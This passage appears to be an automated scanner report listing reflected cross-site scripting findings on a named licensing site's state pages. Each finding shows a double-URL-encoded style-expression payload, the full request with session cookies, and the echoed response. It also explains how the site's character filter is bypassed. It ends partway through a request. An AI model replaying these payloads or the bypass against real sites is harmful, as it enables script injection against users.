NS_RTIMER_COMPOSITE: 1558099633:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=448
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110610


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Louisiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175371&e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1&e214f'style='x:expression(alert(1))'8a4ef989e82=1&fromsla=T&e214f%27style%3d%27x%3aexpression%28alert%281%29%29%278a4ef989e82=1'>
...[SNIP]...

2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Maryland

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 334652572:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 107493


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Maryland</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175374&baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1&baba6'style='x:expression(alert(1))'86c1a467bc1=1&fromsla=T&baba6%27style%3d%27x%3aexpression%28alert%281%29%29%2786c1a467bc1=1'>
...[SNIP]...

2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Massachusetts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -811333024:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=952
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110989


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Massachusetts</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175375&24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1&24d7e'style='x:expression(alert(1))'473118b635c=1&fromsla=T&24d7e%27style%3d%27x%3aexpression%28alert%281%29%29%27473118b635c=1'>
...[SNIP]...

2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Michigan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 328763124:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111075


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Michigan</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175376&c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1&c4c53%27style%3d%27x%3aexpression%28alert%281%29%29%27cbce184105d=1&c4c53'style='x:expression(alert(1))'cbce184105d=1&fromsla=T'>
...[SNIP]...

2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Minnesota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 226398478:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=867
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110670


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Minnesota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175378&84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1&84920'style='x:expression(alert(1))'64dd360bb51=1&fromsla=T&84920%27style%3d%27x%3aexpression%28alert%281%29%29%2764dd360bb51=1'>
...[SNIP]...

2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Mississippi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:23 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259178534:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110299


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mississippi</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175380&2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1&2fff1'style='x:expression(alert(1))'459cb5a215=1&2fff1%27style%3d%27x%3aexpression%28alert%281%29%29%27459cb5a215=1&fromsla=T'>
...[SNIP]...

2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Missouri

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -1255233885:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Missouri</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175381&7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1&7754c'style='x:expression(alert(1))'27eccdc1792=1&7754c%27style%3d%27x%3aexpression%28alert%281%29%29%2727eccdc1792=1&fromsla=T'>
...[SNIP]...

2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:31 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357285:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110208


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175383&5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1&5bcaf%27style%3d%27x%3aexpression%28alert%281%29%29%271afca94aa79=1&fromsla=T&5bcaf'style='x:expression(alert(1))'1afca94aa79=1'>
...[SNIP]...

2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montreal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:19 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1114198378:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=950
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87630


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montreal</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260175&7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1&7c04c'style='x:expression(alert(1))'d59743044a1=1&7c04c%27style%3d%27x%3aexpression%28alert%281%29%29%27d59743044a1=1&fromsla=T'>
...[SNIP]...

2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nebraska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 334654614:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110184


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nebraska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175384&6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1&6e07a%27style%3d%27x%3aexpression%28alert%281%29%29%27040901e41e8=1&fromsla=T&6e07a'style='x:expression(alert(1))'040901e41e8=1'>
...[SNIP]...

2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nevada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
